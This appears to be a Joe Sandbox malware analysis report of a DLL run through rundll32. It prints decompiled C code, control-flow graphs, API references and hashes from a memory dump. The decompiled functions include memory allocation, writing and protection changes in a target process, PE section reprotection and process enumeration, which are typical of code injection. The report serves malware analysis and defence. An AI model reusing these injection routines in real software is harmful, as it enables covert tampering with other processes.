                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MemoryVirtual$Protect$AllocateContextThreadWritememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4020149312-0
                                                                                                                                                                                                                                                                            • Opcode ID: e0d01ad82f77ed8853515b14406a5400482392919babf8e97fcb1cd750ba68c8
                                                                                                                                                                                                                                                                            • Instruction ID: d2ed932ffaf4f6edbd0bce7d0d5901d33af284a1343d289a9543d0866ce73f30
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0d01ad82f77ed8853515b14406a5400482392919babf8e97fcb1cd750ba68c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72313C76A0021AAFEB10CF94CD89EEEBBB9EB09354F104266E509E7154D7709B84CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 195 100144d8-100144e6 196 100144f0-1001451b 195->196 197 100144e8-100144eb 195->197 199 1001451f-10014521 196->199 198 10014728-10014729 197->198 200 10014523 199->200 201 10014525-1001455f NtProtectVirtualMemory 199->201 200->199 202 10014561-10014563 201->202 203 1001456f-10014573 201->203 204 10014565 202->204 205 10014567-1001456a 202->205 206 1001457c-10014586 203->206 204->202 205->198 207 10014726 206->207 208 1001458c-10014598 206->208 207->198 209 1001459a 208->209 210 1001459c-100145f7 call 1000936a call 100092ca 208->210 209->206 216 100145f9-10014600 210->216 217 10014648-1001464f 210->217 219 10014602-10014609 216->219 220 10014654-10014669 216->220 218 100146de-100146e0 217->218 221 100146e2 218->221 222 100146e4-10014711 NtProtectVirtualMemory 218->222 225 100146b3-100146ba 219->225 226 1001460f-10014616 219->226 223 100146b1 220->223 224 1001466b-10014678 220->224 221->218 227 10014713-10014715 222->227 228 1001471b-1001471d 222->228 223->218 224->223 229 1001467a-10014688 224->229 225->218 230 100146bc-100146c3 226->230 231 1001461c-10014623 226->231 234 10014717 227->234 235 10014719 227->235 236 10014721 228->236 237 1001471f 228->237 229->223 238 1001468a-10014698 229->238 230->218 232 100146c5-100146cc 231->232 233 10014629-10014630 231->233 232->218 239 10014636-1001463d 233->239 240 100146ce-100146d5 233->240 234->227 235->236 236->207 237->228 238->223 241 1001469a-100146a8 238->241 242 10014643 239->242 243 100146d7 239->243 240->218 241->223 244 100146aa 241->244 242->218 243->218 244->223
                                                                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                                                                            			E100144D8(signed int __eax, void* _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				long _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				long _v44;
                                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				void* _v60;
                                                                                                                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                                                                            				void* _t180;
                                                                                                                                                                                                                                                                            				void* _t181;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v64 = _v64 & 0x00000000;
                                                                                                                                                                                                                                                                            				if(_a12 == 0) {
                                                                                                                                                                                                                                                                            					return __eax | 0xffffffff;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v32 = _a12;
                                                                                                                                                                                                                                                                            				_v40 =  *((intOrPtr*)(_a12 + 0x3c)) + _a12;
                                                                                                                                                                                                                                                                            				_v52 = _v40;
                                                                                                                                                                                                                                                                            				_t16 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8; // 0xf8
                                                                                                                                                                                                                                                                            				_v20 = _a12 + _t16;
                                                                                                                                                                                                                                                                            				_v36 = _v36 & 0x00000000;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            				} while (0 != 0);
                                                                                                                                                                                                                                                                            				_v44 = 4;
                                                                                                                                                                                                                                                                            				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8;
                                                                                                                                                                                                                                                                            				_v48 = _a16;
                                                                                                                                                                                                                                                                            				_v28 = NtProtectVirtualMemory(_a8,  &_v48,  &_v24, _v44,  &_v36);
                                                                                                                                                                                                                                                                            				if(_v28 >= 0) {
                                                                                                                                                                                                                                                                            					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                            					while(_v12 < ( *(_v52 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v20 + 0x14 + _v12 * 0x28)) != 0) {
                                                                                                                                                                                                                                                                            							E1000936A( &_v76, 0, 9);
                                                                                                                                                                                                                                                                            							E100092CA( &_v76, _v12 * 0x28 + _v20, 8);
                                                                                                                                                                                                                                                                            							_t181 = _t181 + 0x18;
                                                                                                                                                                                                                                                                            							_v60 = _a16 +  *((intOrPtr*)(_v20 + 0xc + _v12 * 0x28));
                                                                                                                                                                                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                            							_v56 =  *(_v20 + 0x24 + _v12 * 0x28) & 0xf0000000;
                                                                                                                                                                                                                                                                            							_v16 = _v56;
                                                                                                                                                                                                                                                                            							if(_v16 == 0x20000000) {
                                                                                                                                                                                                                                                                            								_v8 = 0x10;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								if(_v16 == 0x40000000) {
                                                                                                                                                                                                                                                                            									_v8 = 2;
                                                                                                                                                                                                                                                                            									if( *((char*)(_t180 + 0xbadb65)) == 0x72 &&  *((char*)(_t180 + 0xbadb65)) == 0x64 &&  *((char*)(_t180 + 0xffffffffffffffbb)) == 0x61 &&  *((char*)(_t180 + 0xbadb65)) == 0x74 &&  *((char*)(_t180 + 0xffffffffffffffbd)) == 0x61) {
                                                                                                                                                                                                                                                                            										_v8 = 4;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									if(_v16 == 0x60000000) {
                                                                                                                                                                                                                                                                            										_v8 = 0x20;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										if(_v16 == 0x80000000) {
                                                                                                                                                                                                                                                                            											_v8 = 4;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											if(_v16 == 0xa0000000) {
                                                                                                                                                                                                                                                                            												_v8 = 0x40;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												if(_v16 == 0xc0000000) {
                                                                                                                                                                                                                                                                            													_v8 = 4;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													if(_v16 == 0xe0000000) {
                                                                                                                                                                                                                                                                            														_v8 = 0x40;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							while(0 != 0) {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v24 =  *((intOrPtr*)(_v20 + 0x10 + _v12 * 0x28));
                                                                                                                                                                                                                                                                            							_v28 = NtProtectVirtualMemory(_a8,  &_v60,  &_v24, _v8,  &_v36);
                                                                                                                                                                                                                                                                            							if(_v28 >= 0) {
                                                                                                                                                                                                                                                                            								while(0 != 0) {
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								L43:
                                                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                                                            								_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							while(0 != 0) {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L43;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L6:
                                                                                                                                                                                                                                                                            				if(0 == 0) {
                                                                                                                                                                                                                                                                            					return 0xffffffff;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L6;
                                                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                                                            0x100144de
                                                                                                                                                                                                                                                                            0x100144e6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100144e8
                                                                                                                                                                                                                                                                            0x100144f3
                                                                                                                                                                                                                                                                            0x100144ff
                                                                                                                                                                                                                                                                            0x10014505
                                                                                                                                                                                                                                                                            0x10014511
                                                                                                                                                                                                                                                                            0x10014518
                                                                                                                                                                                                                                                                            0x1001451b
                                                                                                                                                                                                                                                                            0x1001451f
                                                                                                                                                                                                                                                                            0x1001451f
                                                                                                                                                                                                                                                                            0x10014525
                                                                                                                                                                                                                                                                            0x10014537
                                                                                                                                                                                                                                                                            0x1001453d
                                                                                                                                                                                                                                                                            0x10014558
                                                                                                                                                                                                                                                                            0x1001455f
                                                                                                                                                                                                                                                                            0x1001456f
                                                                                                                                                                                                                                                                            0x1001457c
                                                                                                                                                                                                                                                                            0x10014598
                                                                                                                                                                                                                                                                            0x100145a4
                                                                                                                                                                                                                                                                            0x100145ba
                                                                                                                                                                                                                                                                            0x100145bf
                                                                                                                                                                                                                                                                            0x100145d0
                                                                                                                                                                                                                                                                            0x100145d3
                                                                                                                                                                                                                                                                            0x100145e7
                                                                                                                                                                                                                                                                            0x100145ed
                                                                                                                                                                                                                                                                            0x100145f7
                                                                                                                                                                                                                                                                            0x10014648
                                                                                                                                                                                                                                                                            0x100145f9
                                                                                                                                                                                                                                                                            0x10014600
                                                                                                                                                                                                                                                                            0x10014654
                                                                                                                                                                                                                                                                            0x10014669
                                                                                                                                                                                                                                                                            0x100146aa
                                                                                                                                                                                                                                                                            0x100146aa
                                                                                                                                                                                                                                                                            0x10014602
                                                                                                                                                                                                                                                                            0x10014609
                                                                                                                                                                                                                                                                            0x100146b3
                                                                                                                                                                                                                                                                            0x1001460f
                                                                                                                                                                                                                                                                            0x10014616
                                                                                                                                                                                                                                                                            0x100146bc
                                                                                                                                                                                                                                                                            0x1001461c
                                                                                                                                                                                                                                                                            0x10014623
                                                                                                                                                                                                                                                                            0x100146c5
                                                                                                                                                                                                                                                                            0x10014629
                                                                                                                                                                                                                                                                            0x10014630
                                                                                                                                                                                                                                                                            0x100146ce
                                                                                                                                                                                                                                                                            0x10014636
                                                                                                                                                                                                                                                                            0x1001463d
                                                                                                                                                                                                                                                                            0x100146d7
                                                                                                                                                                                                                                                                            0x100146d7
                                                                                                                                                                                                                                                                            0x1001463d
                                                                                                                                                                                                                                                                            0x10014630
                                                                                                                                                                                                                                                                            0x10014623
                                                                                                                                                                                                                                                                            0x10014616
                                                                                                                                                                                                                                                                            0x10014609
                                                                                                                                                                                                                                                                            0x10014600
                                                                                                                                                                                                                                                                            0x100146de
                                                                                                                                                                                                                                                                            0x100146e2
                                                                                                                                                                                                                                                                            0x100146ef
                                                                                                                                                                                                                                                                            0x1001470a
                                                                                                                                                                                                                                                                            0x10014711
                                                                                                                                                                                                                                                                            0x1001471b
                                                                                                                                                                                                                                                                            0x1001471f
                                                                                                                                                                                                                                                                            0x10014721
                                                                                                                                                                                                                                                                            0x10014575
                                                                                                                                                                                                                                                                            0x10014579
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014579
                                                                                                                                                                                                                                                                            0x10014713
                                                                                                                                                                                                                                                                            0x10014717
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014719
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001459a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014726
                                                                                                                                                                                                                                                                            0x10014561
                                                                                                                                                                                                                                                                            0x10014563
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014565
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL(100043D8,?,?,00000004,00000000), ref: 10014555
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 2706961497-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: f29c8957ecab033f66468f640b79c4768bb0c25ba70d7dfc5b456a8dc6320b4f
                                                                                                                                                                                                                                                                            • Instruction ID: 8c9ccfd38e53d97595bd4f830bc44a0b9f9517175c763c98dc2f2187c2248c51
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29c8957ecab033f66468f640b79c4768bb0c25ba70d7dfc5b456a8dc6320b4f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A713A70D04209DFDB50CFA4C980BEEBBF4EB05359F228566E811EA2A1DB74DA91DF11
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                                                            			E1000C800(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                            				void* _v304;
                                                                                                                                                                                                                                                                            				char _v308;
                                                                                                                                                                                                                                                                            				intOrPtr _v312;
                                                                                                                                                                                                                                                                            				char _v316;
                                                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                                                            				char _t27;
                                                                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t40 = __edx;
                                                                                                                                                                                                                                                                            				_v304 = __ecx;
                                                                                                                                                                                                                                                                            				_t20 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                                                            				_t57 = _t20;
                                                                                                                                                                                                                                                                            				_t21 = _t20 | 0xffffffff;
                                                                                                                                                                                                                                                                            				if(_t57 != _t21) {
                                                                                                                                                                                                                                                                            					E1000936A( &_v304, 0, 0x128);
                                                                                                                                                                                                                                                                            					_v304 = 0x128;
                                                                                                                                                                                                                                                                            					if(Process32First(_t57,  &_v304) != 0) {
                                                                                                                                                                                                                                                                            						_t27 = E100091E7(0x20);
                                                                                                                                                                                                                                                                            						_v316 = _t27;
                                                                                                                                                                                                                                                                            						_t51 = 0x1f;
                                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                                            							_t9 = _t51 + 0x63; // 0x82
                                                                                                                                                                                                                                                                            							 *((char*)(_t51 + _t27)) = _t9;
                                                                                                                                                                                                                                                                            							_t51 = _t51 - 1;
                                                                                                                                                                                                                                                                            						} while (_t51 >= 0);
                                                                                                                                                                                                                                                                            						E10009203( &_v316, 0);
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							_t55 = _v312( &_v308, _t40);
                                                                                                                                                                                                                                                                            							if(_t55 == 0) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t49 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            							_push( &_v308);
                                                                                                                                                                                                                                                                            							_push(_t57);
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t49 + 0x48))() != 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_t57);
                                                                                                                                                                                                                                                                            						_t21 = 0 | _t55 == 0x00000000;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t37 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t37 + 0x34))(_t57);
                                                                                                                                                                                                                                                                            						_t21 = 0xfffffffe;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                                            0x1000c818
                                                                                                                                                                                                                                                                            0x1000c81a
                                                                                                                                                                                                                                                                            0x1000c81e
                                                                                                                                                                                                                                                                            0x1000c821
                                                                                                                                                                                                                                                                            0x1000c823
                                                                                                                                                                                                                                                                            0x1000c828
                                                                                                                                                                                                                                                                            0x1000c83b
                                                                                                                                                                                                                                                                            0x1000c843
                                                                                                                                                                                                                                                                            0x1000c857
                                                                                                                                                                                                                                                                            0x1000c869
                                                                                                                                                                                                                                                                            0x1000c871
                                                                                                                                                                                                                                                                            0x1000c875
                                                                                                                                                                                                                                                                            0x1000c876
                                                                                                                                                                                                                                                                            0x1000c876
                                                                                                                                                                                                                                                                            0x1000c879
                                                                                                                                                                                                                                                                            0x1000c87c
                                                                                                                                                                                                                                                                            0x1000c87c
                                                                                                                                                                                                                                                                            0x1000c888
                                                                                                                                                                                                                                                                            0x1000c88f
                                                                                                                                                                                                                                                                            0x1000c899
                                                                                                                                                                                                                                                                            0x1000c89f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000c8a1
                                                                                                                                                                                                                                                                            0x1000c8ab
                                                                                                                                                                                                                                                                            0x1000c8ac
                                                                                                                                                                                                                                                                            0x1000c8b2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000c8b2
                                                                                                                                                                                                                                                                            0x1000c8ba
                                                                                                                                                                                                                                                                            0x1000c8c1
                                                                                                                                                                                                                                                                            0x1000c859
                                                                                                                                                                                                                                                                            0x1000c859
                                                                                                                                                                                                                                                                            0x1000c85f
                                                                                                                                                                                                                                                                            0x1000c864
                                                                                                                                                                                                                                                                            0x1000c864
                                                                                                                                                                                                                                                                            0x1000c857
                                                                                                                                                                                                                                                                            0x1000c8ca

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 1000C81E
                                                                                                                                                                                                                                                                              • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 1000C852
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000C8BA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3344077921-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9acbeec960e4eee4feb4ae2fd037e30788636bba3a67935c8320dabe02241bd7
                                                                                                                                                                                                                                                                            • Instruction ID: 36a9b33bf08feeffb89c0f046acd7b405da6ef9df32260d613b3c798c1d25f8e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9acbeec960e4eee4feb4ae2fd037e30788636bba3a67935c8320dabe02241bd7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1421F8336043056FE310DF64DC45E9A7BD9EF893A0F24052AF554C75D6EA30D909C7A5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 309 1000caf3-1000cb26 NtAllocateVirtualMemory 310 1000cb71 309->310 311 1000cb28-1000cb39 NtWriteVirtualMemory 309->311 314 1000cb73-1000cb77 310->314 312 1000cb5a-1000cb5e 311->312 313 1000cb3b-1000cb53 NtProtectVirtualMemory 311->313 312->310 316 1000cb60-1000cb6d 312->316 313->312 315 1000cb55-1000cb58 313->315 315->314 316->310
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E1000CAF3(void* __ecx, void* __edx, void* _a4, long _a8, long _a12) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t37 = _a8;
                                                                                                                                                                                                                                                                            				_t41 = __ecx;
                                                                                                                                                                                                                                                                            				_a8 = _t37;
                                                                                                                                                                                                                                                                            				_t42 = __edx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                                            				_t25 = NtAllocateVirtualMemory(__edx,  &_v8, 0,  &_a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            				if(_t25 < 0) {
                                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(NtWriteVirtualMemory(_t42, _v8, _a4, _t37,  &_v12) < 0) {
                                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                                            					if(_v8 != 0) {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t41 + 4))(_t42,  &_v8,  &_a8, 0x8000);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_a8 = _t37;
                                                                                                                                                                                                                                                                            				if(NtProtectVirtualMemory(_t42,  &_v8,  &_a8, _a12,  &_v16) < 0) {
                                                                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x1000cafa
                                                                                                                                                                                                                                                                            0x1000cb0a
                                                                                                                                                                                                                                                                            0x1000cb0c
                                                                                                                                                                                                                                                                            0x1000cb15
                                                                                                                                                                                                                                                                            0x1000cb17
                                                                                                                                                                                                                                                                            0x1000cb1c
                                                                                                                                                                                                                                                                            0x1000cb1f
                                                                                                                                                                                                                                                                            0x1000cb22
                                                                                                                                                                                                                                                                            0x1000cb26
                                                                                                                                                                                                                                                                            0x1000cb71
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000cb71
                                                                                                                                                                                                                                                                            0x1000cb39
                                                                                                                                                                                                                                                                            0x1000cb5a
                                                                                                                                                                                                                                                                            0x1000cb5e
                                                                                                                                                                                                                                                                            0x1000cb6e
                                                                                                                                                                                                                                                                            0x1000cb6e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000cb5e
                                                                                                                                                                                                                                                                            0x1000cb3e
                                                                                                                                                                                                                                                                            0x1000cb53
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB22
                                                                                                                                                                                                                                                                            • NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB34
                                                                                                                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB4E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MemoryVirtual$AllocateProtectWrite
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2264391890-0
                                                                                                                                                                                                                                                                            • Opcode ID: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                                                                                                                                                                                                                            • Instruction ID: 892a4515f77ee017147e8a2b0b2c61a0bf4351e7243d22ba98e9bd68d4923f67
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE11E976A0020DBFEB05CF95C845EDEBBBCEF48354F108166BA19D6140D730DB049BA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 86%
